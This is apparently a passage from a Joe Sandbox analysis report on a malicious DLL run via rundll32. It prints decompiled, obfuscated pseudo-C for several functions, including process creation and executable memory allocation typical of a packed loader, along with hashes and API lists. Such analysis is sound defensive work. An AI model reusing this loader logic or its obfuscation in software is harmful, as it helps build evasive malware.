Opcode Fuzzy Hash: c6da9376574e22f51c7165c9467081c82437132c063fcbb2395c633c04a9611b
Instruction Fuzzy Hash: 1B11996148E7D18FD3039774AC296A07FB1AF83210B0E06DBD488CF0B3E2590A99C763

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2296 Parent PID: 2416 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	25.3%
Signature Coverage:	23.1%
Total number of Nodes:	91
Total number of Limit Nodes:	4

Executed Functions

Function 1000DBB2, Relevance: 10.4, Strings: 8, Instructions: 359
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E1000DBB2() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				unsigned int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				unsigned int _v1708;
				signed int _v1712;
				signed int _t389;
				signed short* _t394;
				signed int* _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t416;
				signed int* _t453;
				void* _t454;
				signed int _t458;
				signed short* _t461;
				signed int* _t462;

				_t462 =  &_v1712;
				_v1572 = 0xef59;
				_t397 = 0x6c;
				_v1572 = _v1572 / _t397;
				_v1572 = _v1572 ^ 0x0000021e;
				_t395 = 0;
				_v1684 = 0x1e32;
				_t454 = 0x1b835ac8;
				_t458 = 3;
				_v1684 = _v1684 / _t458;
				_v1684 = _v1684 + 0x4417;
				_v1684 = _v1684 >> 4;
				_v1684 = _v1684 ^ 0x00001397;
				_v1568 = 0x84db;
				_v1568 = _v1568 | 0x6bc882ba;
				_v1568 = _v1568 ^ 0x6bc8bd06;
				_v1664 = 0xbc85;
				_v1664 = _v1664 | 0x271c5f66;
				_v1664 = _v1664 + 0xffff53d9;
				_v1664 = _v1664 ^ 0x271c0663;
				_v1708 = 0xe214;
				_t398 = 0x74;
				_v1708 = _v1708 / _t398;
				_v1708 = _v1708 << 0xf;
				_v1708 = _v1708 >> 4;
				_v1708 = _v1708 ^ 0x000ffd2c;
				_v1620 = 0x4a28;
				_v1620 = _v1620 ^ 0x00000936;
				_v1576 = 0x257c;
				_t399 = 0x45;
				_v1576 = _v1576 / _t399;
				_v1576 = _v1576 ^ 0x00004781;
				_v1628 = 0x60da;
				_v1628 = _v1628 ^ 0xae80722e;
				_v1628 = _v1628 ^ 0xae800fd8;
				_v1692 = 0xb041;
				_v1692 = _v1692 << 0xb;
				_v1692 = _v1692 + 0xffff1ede;
				_v1692 = _v1692 << 6;
				_v1692 = _v1692 ^ 0x6049f794;
				_v1564 = 0x3030;
				_v1564 = _v1564 | 0x6b89648b;
				_v1564 = _v1564 ^ 0x6b893105;
				_v1676 = 0xf769;
				_v1676 = _v1676 ^ 0xeb44f14a;
				_v1676 = _v1676 >> 2;
				_v1676 = _v1676 ^ 0x3ad14d47;
				_v1604 = 0x411d;
				_v1604 = _v1604 << 4;
				_v1604 = _v1604 ^ 0x00047fe4;
				_v1580 = 0xfd3;
				_t400 = 0x4a;
				_v1580 = _v1580 / _t400;
				_v1580 = _v1580 ^ 0x00005dd2;
				_v1700 = 0x87;
				_t401 = 0xe;
				_v1700 = _v1700 / _t401;
				_t402 = 0x3f;
				_v1700 = _v1700 / _t402;
				_v1700 = _v1700 >> 0xd;
				_v1700 = _v1700 ^ 0x000026b4;
				_v1612 = 0x3564;
				_v1612 = _v1612 ^ 0xda9c4183;
				_v1612 = _v1612 ^ 0xda9c1904;
				_v1712 = 0xc2f6;
				_t403 = 0x2a;
				_v1712 = _v1712 / _t403;
				_t404 = 0x36;
				_v1712 = _v1712 / _t404;
				_v1712 = _v1712 | 0x41ae0c96;
				_v1712 = _v1712 ^ 0x41ae4aea;
				_v1648 = 0x458e;
				_v1648 = _v1648 + 0xffff591f;
				_t405 = 0x55;
				_v1648 = _v1648 / _t405;
				_v1648 = _v1648 ^ 0x03035401;
				_v1668 = 0x2d8a;
				_v1668 = _v1668 | 0xaa688d8c;
				_v1668 = _v1668 << 3;
				_v1668 = _v1668 ^ 0x534501b3;
				_v1596 = 0x1f8c;
				_v1596 = _v1596 | 0x396c7cb0;
				_v1596 = _v1596 ^ 0x396c08e4;
				_v1656 = 0xcb53;
				_v1656 = _v1656 << 0xd;
				_v1656 = _v1656 + 0xffffafd5;
				_v1656 = _v1656 ^ 0x196a606d;
				_v1588 = 0x793d;
				_v1588 = _v1588 + 0x32c5;
				_v1588 = _v1588 ^ 0x0000fb2f;
				_v1660 = 0xbbc;
				_v1660 = _v1660 + 0xffff52b2;
				_v1660 = _v1660 / _t458;
				_v1660 = _v1660 ^ 0x55552507;
				_v1672 = 0xe513;
				_v1672 = _v1672 * 0x49;
				_v1672 = _v1672 ^ 0x1b46911c;
				_v1672 = _v1672 ^ 0x1b07de20;
				_v1624 = 0xbbcb;
				_v1624 = _v1624 ^ 0x2b0a60c9;
				_v1624 = _v1624 ^ 0x2b0aec0b;
				_v1640 = 0xe4f0;
				_v1640 = _v1640 ^ 0x96004651;
				_v1640 = _v1640 | 0x42dfae8f;
				_v1640 = _v1640 ^ 0xd6dfb88e;
				_v1652 = 0xd04e;
				_v1652 = _v1652 >> 1;
				_v1652 = _v1652 + 0xffff3842;
				_v1652 = _v1652 ^ 0xffffd892;
				_v1600 = 0xe0fa;
				_v1600 = _v1600 >> 1;
				_v1600 = _v1600 ^ 0x000043f5;
				_v1608 = 0xc1c2;
				_v1608 = _v1608 + 0xaeee;
				_v1608 = _v1608 ^ 0x0001280d;
				_v1616 = 0x50d9;
				_v1616 = _v1616 >> 0xf;
				_v1616 = _v1616 ^ 0x00001eb0;
				_v1704 = 0xc7ff;
				_v1704 = _v1704 + 0x55d6;
				_v1704 = _v1704 + 0xffffd868;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 ^ 0x007b66c9;
				_v1636 = 0x58f3;
				_v1636 = _v1636 ^ 0xd4a8cb35;
				_v1636 = _v1636 | 0x612d3fa4;
				_v1636 = _v1636 ^ 0xf5ada24c;
				_v1592 = 0xf8eb;
				_v1592 = _v1592 >> 1;
				_v1592 = _v1592 ^ 0x000041ba;
				_v1696 = 0x25d4;
				_v1696 = _v1696 >> 5;
				_t406 = 0x4f;
				_v1696 = _v1696 / _t406;
				_v1696 = _v1696 + 0xffffa5cc;
				_v1696 = _v1696 ^ 0xffffbedd;
				_v1644 = 0x2ec9;
				_v1644 = _v1644 << 6;
				_v1644 = _v1644 + 0xffffbc67;
				_v1644 = _v1644 ^ 0x000b3a24;
				_v1680 = 0x6317;
				_v1680 = _v1680 >> 0xf;
				_t407 = 6;
				_v1680 = _v1680 * 0x7a;
				_v1680 = _v1680 + 0xe3e4;
				_v1680 = _v1680 ^ 0x0000f45d;
				_v1632 = 0x2be0;
				_v1632 = _v1632 | 0x6c07e907;
				_v1632 = _v1632 ^ 0x6c07e16a;
				_v1688 = 0x95f3;
				_t461 = _v1632;
				_v1688 = _v1688 / _t407;
				_v1688 = _v1688 | 0x5dc4641b;
				_v1688 = _v1688 + 0xffff607d;
				_v1688 = _v1688 ^ 0x5dc3ecda;
				_v1584 = 0x2547;
				_v1584 = _v1584 + 0xffff009e;
				_v1584 = _v1584 ^ 0xffff1683;
				while(_t454 != 0x5465853) {
					if(_t454 == 0x7fdd35a) {
						_push(_v1584);
						_push(_t395);
						_push(_t407);
						_push(_v1688);
						_push(_v1632);
						_push(_t461);
						_push(_t395);
						E1001B0D5(0, _v1680, __eflags);
						_t395 = 1;
						__eflags = 1;
					} else {
						if(_t454 == 0x1b835ac8) {
							E1001A68F(0x208,  &_v1560, _v1684, _v1568);
							_pop(_t407);
							_t454 = 0x33bdf54c;
							continue;
						} else {
							if(_t454 == 0x21471f3f) {
								_push(_v1692);
								_push(_v1628);
								_push(_v1576);
								_t389 = E10001B9D(_v1564, _v1676,  &_v1560, E1000B871(0x10001518, _v1620, __eflags)); // executed
								asm("sbb edi, edi");
								_t407 = _v1604;
								_t454 = ( ~_t389 & 0xe5d5522d) + 0x1f710626;
								E1000717B(_t407, _v1580, _v1700, _t387, _v1612);
								_t462 =  &(_t462[8]);
								goto L20;
							} else {
								if(_t454 == 0x33bdf54c) {
									_t461 = E1000D43E();
									_t454 = 0x3a901937;
									continue;
								} else {
									if(_t454 != 0x3a901937) {
										L20:
										__eflags = _t454 - 0x1f710626;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_t394 = _t461;
										if( *_t461 != _t395) {
											do {
												if( *_t394 == 0x2c) {
													_t453 =  &_v1560;
													while(1) {
														_t394 =  &(_t394[1]);
														_t416 =  *_t394 & 0x0000ffff;
														if(_t416 == 0) {
															break;
														}
														__eflags = _t416 - 0x20;
														if(__eflags != 0) {
															 *_t453 = _t416;
															_t453 =  &(_t453[0]);
															__eflags = _t453;
															continue;
														}
														break;
													}
													_t407 = 0;
													 *_t453 = 0;
												}
												_t394 =  &(_t394[1]);
											} while ( *_t394 != _t395);
										}
										_t454 = 0x21471f3f;
										continue;
									}
								}
							}
						}
					}
					return _t395;
				}
				E1001BA7B(_v1572, _t407, _v1712, _v1648, _t407,  &_v520, _v1668, _v1596); // executed
				E1001B82F( &_v1040, _v1656, __eflags, _v1588);
				_push(_v1640);
				_push(_v1624);
				_push(_v1672);
				E1000487B(_v1600, __eflags, 0x10001538, _v1608, _v1616, E1000B871(0x10001538, _v1660, __eflags), _t461,  &_v520, _v1704,  &_v1040);
				_t407 = _v1636;
				E1000717B(_t407, _v1592, _v1696, _t379, _v1644);
				_t462 =  &(_t462[0x16]);
				_t454 = 0x7fdd35a;
				goto L20;
			}

0x1000dbb2
0x1000dbb8
0x1000dbd2
0x1000dbd7
0x1000dbe0
0x1000dbeb
0x1000dbed
0x1000dbf5
0x1000dbfe
0x1000dc03
0x1000dc09
0x1000dc11
0x1000dc16
0x1000dc1e
0x1000dc29
0x1000dc34
0x1000dc3f
0x1000dc47
0x1000dc4f
0x1000dc57
0x1000dc5f
0x1000dc6b
0x1000dc70
0x1000dc76
0x1000dc7b
0x1000dc80
0x1000dc88
0x1000dc98
0x1000dca0
0x1000dcb2
0x1000dcb7
0x1000dcc0
0x1000dccb
0x1000dcd3
0x1000dcdb
0x1000dce3
0x1000dceb
0x1000dcf0
0x1000dcf8
0x1000dcfd
0x1000dd05
0x1000dd10
0x1000dd1b
0x1000dd26
0x1000dd2e
0x1000dd36
0x1000dd3b
0x1000dd43
0x1000dd4e
0x1000dd56
0x1000dd61
0x1000dd73
0x1000dd76
0x1000dd7d
0x1000dd88
0x1000dd98
0x1000dd9d
0x1000dda7
0x1000ddac
0x1000ddb0
0x1000ddb5
0x1000ddbd
0x1000ddc5
0x1000ddcd
0x1000ddd5
0x1000dde3
0x1000dde8
0x1000ddf2
0x1000ddf7
0x1000ddfb
0x1000de03
0x1000de0b
0x1000de13
0x1000de21
0x1000de26
0x1000de2a
0x1000de32
0x1000de3a
0x1000de42
0x1000de47
0x1000de4f
0x1000de5a
0x1000de65
0x1000de70
0x1000de78
0x1000de7d
0x1000de85
0x1000de8d
0x1000de98
0x1000dea3
0x1000deae
0x1000deb6
0x1000dec4
0x1000dec8
0x1000ded0
0x1000dedd
0x1000dee1
0x1000dee9
0x1000def1
0x1000def9
0x1000df01
0x1000df09
0x1000df11
0x1000df19
0x1000df21
0x1000df29
0x1000df31
0x1000df35
0x1000df3d
0x1000df45
0x1000df50
0x1000df57
0x1000df62
0x1000df6a
0x1000df74
0x1000df7c
0x1000df84
0x1000df89
0x1000df91
0x1000df99
0x1000dfa1
0x1000dfa9
0x1000dfae
0x1000dfb6
0x1000dfbe
0x1000dfc6
0x1000dfce
0x1000dfd6
0x1000dfe1
0x1000dfe8
0x1000dff3
0x1000dffb
0x1000e006
0x1000e00b
0x1000e011
0x1000e019
0x1000e021
0x1000e029
0x1000e02e
0x1000e036
0x1000e03e
0x1000e046
0x1000e050
0x1000e051
0x1000e055
0x1000e05d
0x1000e065
0x1000e06d
0x1000e075
0x1000e07d
0x1000e08b
0x1000e08f
0x1000e093
0x1000e09b
0x1000e0a3
0x1000e0ab
0x1000e0b6
0x1000e0c1
0x1000e0cc
0x1000e0de
0x1000e2cc
0x1000e2d3
0x1000e2d4
0x1000e2d5
0x1000e2db
0x1000e2e3
0x1000e2e4
0x1000e2e5
0x1000e2ef
0x1000e2ef
0x1000e0e4
0x1000e0ea
0x1000e1f2
0x1000e1f8
0x1000e1f9
0x00000000
0x1000e0f0
0x1000e0f6
0x1000e16a
0x1000e173
0x1000e177
0x1000e19d
0x1000e1b9
0x1000e1bb
0x1000e1c8
0x1000e1ce
0x1000e1d3
0x00000000
0x1000e0f8
0x1000e0fe
0x1000e15e
0x1000e160
0x00000000
0x1000e100
0x1000e106
0x1000e2be
0x1000e2be
0x1000e2c4
0x00000000
0x00000000
0x1000e2ca
0x1000e10c
0x1000e10c
0x1000e112
0x1000e114
0x1000e118
0x1000e11a
0x1000e12f
0x1000e12f
0x1000e132
0x1000e138
0x00000000
0x00000000
0x1000e123
0x1000e127
0x1000e129
0x1000e12c
0x1000e12c
0x00000000
0x1000e12c
0x00000000
0x1000e127
0x1000e13a
0x1000e13c
0x1000e13c
0x1000e13f
0x1000e142
0x1000e114
0x1000e147
0x00000000
0x1000e147
0x1000e106
0x1000e0fe
0x1000e0f6
0x1000e0ea
0x1000e2fc
0x1000e2fc
0x1000e227
0x1000e241
0x1000e246
0x1000e24f
0x1000e253
0x1000e295
0x1000e2aa
0x1000e2b1
0x1000e2b6
0x1000e2b9
0x00000000

Strings

6, xrefs: 1000DC98
00, xrefs: 1000DD05
|%, xrefs: 1000DCA0
G%, xrefs: 1000E0AB
+, xrefs: 1000E065
=y, xrefs: 1000DE8D
QF, xrefs: 1000DF11
d5, xrefs: 1000DDBD

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 00$6$=y$G%$QF$d5$|%$+
API String ID: 0-3837980227
Opcode ID: 0ba429e661d480be1c10e98999bfc72675623b4edb03bc1571f0942461facbd4
Instruction ID: 1e29a6c9415a9fe0cc0243d733f4debc9f78a0aacd60a9bd7541d4d9426792d1
Opcode Fuzzy Hash: 0ba429e661d480be1c10e98999bfc72675623b4edb03bc1571f0942461facbd4
Instruction Fuzzy Hash: 540226715083819FE368CF25C88964BBBF2FBC5394F10891DF199862A4D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001B0D5, Relevance: 1.4, Strings: 1, Instructions: 176
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E1001B0D5(WCHAR* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t184;
				void* _t197;
				void* _t198;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				struct _STARTUPINFOW* _t207;
				intOrPtr _t225;
				WCHAR* _t228;
				void* _t231;
				void* _t232;

				_t231 = _t232 - 0x5c;
				_push( *((intOrPtr*)(_t231 + 0x7c)));
				_t225 =  *((intOrPtr*)(_t231 + 0x78));
				_push(_t225);
				_push(0);
				_push( *((intOrPtr*)(_t231 + 0x70)));
				_t228 = __ecx;
				_push( *((intOrPtr*)(_t231 + 0x6c)));
				_push( *((intOrPtr*)(_t231 + 0x68)));
				_push( *((intOrPtr*)(_t231 + 0x64)));
				_push(__edx);
				_push(__ecx);
				_t184 = E10017B8C(0);
				 *((intOrPtr*)(_t231 + 0xc)) = _t184;
				 *((intOrPtr*)(_t231 + 0x10)) = _t184;
				 *((intOrPtr*)(_t231 + 8)) = 0x709f5;
				 *(_t231 + 0x54) = 0x377e;
				 *(_t231 + 0x54) =  *(_t231 + 0x54) ^ 0x4266f6fe;
				_t203 = 0x1d;
				 *(_t231 + 0x54) =  *(_t231 + 0x54) * 0x3b;
				 *(_t231 + 0x54) =  *(_t231 + 0x54) | 0x717c5634;
				 *(_t231 + 0x54) =  *(_t231 + 0x54) ^ 0x7dfeedd7;
				 *(_t231 + 0x34) = 0x34f9;
				 *(_t231 + 0x34) =  *(_t231 + 0x34) >> 7;
				 *(_t231 + 0x34) =  *(_t231 + 0x34) / _t203;
				 *(_t231 + 0x34) =  *(_t231 + 0x34) ^ 0x00000afd;
				 *(_t231 + 0x58) = 0x7248;
				 *(_t231 + 0x58) =  *(_t231 + 0x58) + 0xfffff52a;
				 *(_t231 + 0x58) =  *(_t231 + 0x58) << 2;
				_t204 = 0x4b;
				 *(_t231 + 0x58) =  *(_t231 + 0x58) / _t204;
				 *(_t231 + 0x58) =  *(_t231 + 0x58) ^ 0x00000183;
				 *(_t231 + 0x24) = 0x45a6;
				 *(_t231 + 0x24) =  *(_t231 + 0x24) >> 0xb;
				 *(_t231 + 0x24) =  *(_t231 + 0x24) ^ 0x00000e4e;
				 *(_t231 + 0x14) = 0x7a3d;
				 *(_t231 + 0x14) =  *(_t231 + 0x14) ^ 0x04a02c50;
				 *(_t231 + 0x14) =  *(_t231 + 0x14) ^ 0x04a00c66;
				 *(_t231 + 0x38) = 0xa03f;
				 *(_t231 + 0x38) =  *(_t231 + 0x38) ^ 0xad4550e8;
				 *(_t231 + 0x38) =  *(_t231 + 0x38) + 0x6056;
				 *(_t231 + 0x38) =  *(_t231 + 0x38) ^ 0xad4621a6;
				 *(_t231 + 0x30) = 0x9753;
				 *(_t231 + 0x30) =  *(_t231 + 0x30) ^ 0x01712175;
				 *(_t231 + 0x30) =  *(_t231 + 0x30) ^ 0x34595398;
				 *(_t231 + 0x30) =  *(_t231 + 0x30) ^ 0x3528c85a;
				 *(_t231 + 0x28) = 0x5970;
				 *(_t231 + 0x28) =  *(_t231 + 0x28) + 0xe646;
				 *(_t231 + 0x28) =  *(_t231 + 0x28) ^ 0x0001015e;
				 *(_t231 + 0x4c) = 0x8818;
				 *(_t231 + 0x4c) =  *(_t231 + 0x4c) << 9;
				 *(_t231 + 0x4c) =  *(_t231 + 0x4c) ^ 0x1db89c86;
				 *(_t231 + 0x4c) =  *(_t231 + 0x4c) | 0xd4865b1a;
				 *(_t231 + 0x4c) =  *(_t231 + 0x4c) ^ 0xdcaede6a;
				 *(_t231 + 0x18) = 0x7142;
				 *(_t231 + 0x18) =  *(_t231 + 0x18) ^ 0x210103cc;
				 *(_t231 + 0x18) =  *(_t231 + 0x18) ^ 0x21015f5c;
				 *(_t231 + 0x1c) = 0x6f52;
				 *(_t231 + 0x1c) =  *(_t231 + 0x1c) << 0xc;
				 *(_t231 + 0x1c) =  *(_t231 + 0x1c) ^ 0x06f5148a;
				 *(_t231 + 0x44) = 0x5d00;
				 *(_t231 + 0x44) =  *(_t231 + 0x44) * 0x61;
				 *(_t231 + 0x44) =  *(_t231 + 0x44) ^ 0x1b07b64b;
				 *(_t231 + 0x44) =  *(_t231 + 0x44) << 6;
				 *(_t231 + 0x44) =  *(_t231 + 0x44) ^ 0xc9228f6b;
				 *(_t231 + 0x3c) = 0x398f;
				_t205 = 0x70;
				 *(_t231 + 0x3c) =  *(_t231 + 0x3c) / _t205;
				 *(_t231 + 0x3c) =  *(_t231 + 0x3c) >> 4;
				 *(_t231 + 0x3c) =  *(_t231 + 0x3c) ^ 0x000063d0;
				 *(_t231 + 0x48) = 0xf131;
				 *(_t231 + 0x48) =  *(_t231 + 0x48) << 2;
				 *(_t231 + 0x48) =  *(_t231 + 0x48) << 0xa;
				 *(_t231 + 0x48) =  *(_t231 + 0x48) | 0x1e659875;
				 *(_t231 + 0x48) =  *(_t231 + 0x48) ^ 0x1f77a32b;
				 *(_t231 + 0x50) = 0x56d5;
				_t206 = 0x24;
				_t127 = _t231 - 0x4c; // 0xf5ada200
				 *(_t231 + 0x50) =  *(_t231 + 0x50) / _t206;
				 *(_t231 + 0x50) =  *(_t231 + 0x50) >> 0x10;
				 *(_t231 + 0x50) =  *(_t231 + 0x50) + 0x1086;
				 *(_t231 + 0x50) =  *(_t231 + 0x50) ^ 0x000030ea;
				 *(_t231 + 0x40) = 0xd59c;
				 *(_t231 + 0x40) =  *(_t231 + 0x40) ^ 0xe4204ab5;
				 *(_t231 + 0x40) =  *(_t231 + 0x40) ^ 0x2c0f366d;
				 *(_t231 + 0x40) =  *(_t231 + 0x40) >> 7;
				 *(_t231 + 0x40) =  *(_t231 + 0x40) ^ 0x01900e44;
				 *(_t231 + 0x2c) = 0x63ff;
				 *(_t231 + 0x2c) =  *(_t231 + 0x2c) >> 3;
				 *(_t231 + 0x2c) =  *(_t231 + 0x2c) + 0x2259;
				 *(_t231 + 0x2c) =  *(_t231 + 0x2c) ^ 0x00007280;
				 *(_t231 + 0x20) = 0x3b47;
				 *(_t231 + 0x20) =  *(_t231 + 0x20) | 0xfd526664;
				 *(_t231 + 0x20) =  *(_t231 + 0x20) ^ 0xfd52248a;
				_push( *(_t231 + 0x34));
				_push( *(_t231 + 0x54));
				_t207 = 0x44;
				E1001A68F(_t207, _t127);
				 *((intOrPtr*)(_t231 - 0x4c)) = 0x44;
				_t159 = _t231 - 0x4c; // 0xf5ada200
				_t170 = _t231 - 8; // 0xf5ada244
				_t197 = E10019C80(_t170, _t228,  *(_t231 + 0x58),  *((intOrPtr*)(_t231 + 0x68)),  *(_t231 + 0x24), _t207, _t207,  *(_t231 + 0x14), _t207, _t159,  *(_t231 + 0x38),  *(_t231 + 0x30),  *(_t231 + 0x28),  *(_t231 + 0x4c), _t207,  *((intOrPtr*)(_t231 + 0x64)),  *(_t231 + 0x18),  *(_t231 + 0x1c),  *(_t231 + 0x44)); // executed
				if(_t197 == 0) {
					_t198 = 0;
				} else {
					if(_t225 == 0) {
						E1000ADFC( *(_t231 + 0x3c),  *(_t231 + 0x48),  *((intOrPtr*)(_t231 - 8)),  *(_t231 + 0x50));
						E1000ADFC( *(_t231 + 0x40),  *(_t231 + 0x2c),  *((intOrPtr*)(_t231 - 4)),  *(_t231 + 0x20));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t198 = 1;
				}
				return _t198;
			}

0x1001b0d6
0x1001b0e2
0x1001b0e5
0x1001b0ea
0x1001b0eb
0x1001b0ec
0x1001b0ef
0x1001b0f1
0x1001b0f4
0x1001b0f7
0x1001b0fa
0x1001b0fb
0x1001b0fc
0x1001b101
0x1001b106
0x1001b109
0x1001b110
0x1001b117
0x1001b124
0x1001b127
0x1001b12a
0x1001b131
0x1001b138
0x1001b13f
0x1001b14a
0x1001b14d
0x1001b154
0x1001b15b
0x1001b162
0x1001b169
0x1001b16e
0x1001b171
0x1001b178
0x1001b17f
0x1001b183
0x1001b18a
0x1001b191
0x1001b198
0x1001b19f
0x1001b1a6
0x1001b1ad
0x1001b1b4
0x1001b1bb
0x1001b1c2
0x1001b1c9
0x1001b1d0
0x1001b1d7
0x1001b1de
0x1001b1e5
0x1001b1ec
0x1001b1f3
0x1001b1f7
0x1001b1fe
0x1001b205
0x1001b20c
0x1001b213
0x1001b21a
0x1001b221
0x1001b228
0x1001b22c
0x1001b233
0x1001b23e
0x1001b241
0x1001b248
0x1001b24c
0x1001b255
0x1001b25f
0x1001b264
0x1001b269
0x1001b26d
0x1001b274
0x1001b27b
0x1001b27f
0x1001b283
0x1001b28a
0x1001b291
0x1001b29b
0x1001b29e
0x1001b2a1
0x1001b2a4
0x1001b2a8
0x1001b2af
0x1001b2b6
0x1001b2bd
0x1001b2c4
0x1001b2cb
0x1001b2cf
0x1001b2d6
0x1001b2dd
0x1001b2e1
0x1001b2e8
0x1001b2ef
0x1001b2f6
0x1001b2fd
0x1001b304
0x1001b307
0x1001b30c
0x1001b30d
0x1001b315
0x1001b31c
0x1001b344
0x1001b34d
0x1001b357
0x1001b390
0x1001b359
0x1001b35b
0x1001b375
0x1001b386
0x1001b35d
0x1001b360
0x1001b361
0x1001b362
0x1001b363
0x1001b363
0x1001b366
0x1001b366
0x1001b398

Strings

4V|q, xrefs: 1001B12A

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 4V|q
API String ID: 963392458-2461308344
Opcode ID: 95f32673c102f6614b90733422b27ca3e0fc97e60e2c9efea81dcb63516b578c
Instruction ID: e7196e7f70d93a3aae9487e10738bce9d711e12ca190619b00ebb328bd3ecd6d
Opcode Fuzzy Hash: 95f32673c102f6614b90733422b27ca3e0fc97e60e2c9efea81dcb63516b578c
Instruction Fuzzy Hash: 2B81D371500288EFEF59CF60D94A5CE3BA1FF44358F509218FE2A96160D7BAD998CF80

Uniqueness

Uniqueness Score: -1.00%

Function 10013DA3, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10013DA3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t49;

				_v12 = 0xd5;
				_v12 = _v12 + 0xee5c;
				_v12 = _v12 | 0x8aaf0837;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0xaafeb881;
				_v20 = 0xab6b;
				_v20 = _v20 + 0xffffd0c9;
				_v20 = _v20 + 0x2ddc;
				_v20 = _v20 ^ 0x00008f38;
				_v16 = 0x3314;
				_v16 = _v16 + 0x9923;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0330d641;
				_v8 = 0x7967;
				_t49 = 0x1f;
				_push(_t49);
				_v8 = _v8 / _t49;
				_push(_t49);
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xe543aa3f;
				_v8 = _v8 ^ 0xe5437a66;
				E10004010(_t49, 0xac2d26d8, 0x135, _t49, 0xed6bd295);
				ExitProcess(0);
			}

0x10013da9
0x10013db2
0x10013db9
0x10013dc0
0x10013dc4
0x10013dcb
0x10013dd2
0x10013dd9
0x10013de0
0x10013de7
0x10013dee
0x10013df5
0x10013df9
0x10013e00
0x10013e0c
0x10013e0f
0x10013e10
0x10013e1c
0x10013e28
0x10013e2b
0x10013e32
0x10013e45
0x10013e4f

APIs

ExitProcess.KERNEL32(00000000), ref: 10013E4F

Strings

fzC, xrefs: 10013E39
fzC, xrefs: 10013E18, 10013E07
\, xrefs: 10013DB2

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: \$fzC$fzC
API String ID: 621844428-4050105108
Opcode ID: 39e0b3e0242c1929c766ff58a4197b726e5855b5b80b7d8746351de9eb5fb273
Instruction ID: 9f2c94031404c76f8a4347eca4ab1513b66c159a7c61353c874c37c29794b4be
Opcode Fuzzy Hash: 39e0b3e0242c1929c766ff58a4197b726e5855b5b80b7d8746351de9eb5fb273
Instruction Fuzzy Hash: A911F5B1D00308EFEB48DFA5C94A59EBBB0FB04708F208198E415B7291E7B86B45DF40

Uniqueness

Uniqueness Score: -1.00%

Function 0022FB30, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0022FB75
UnmapViewOfFile.KERNELBASE(?), ref: 0022FC25
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0022FC3F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0022FD70

Memory Dump Source

Source File: 00000007.00000002.2110565424.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_210000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 3ffd0d39c37ea4c4566aa0b47cdd3a35c6ca7c80e8441014ee9fa50c390047d7
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 4DB19A75A00109EFCB48CF84D590EAEB7B5BF88304F248169E919AB355D735EE92CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10001B9D, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E10001B9D(void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8) {
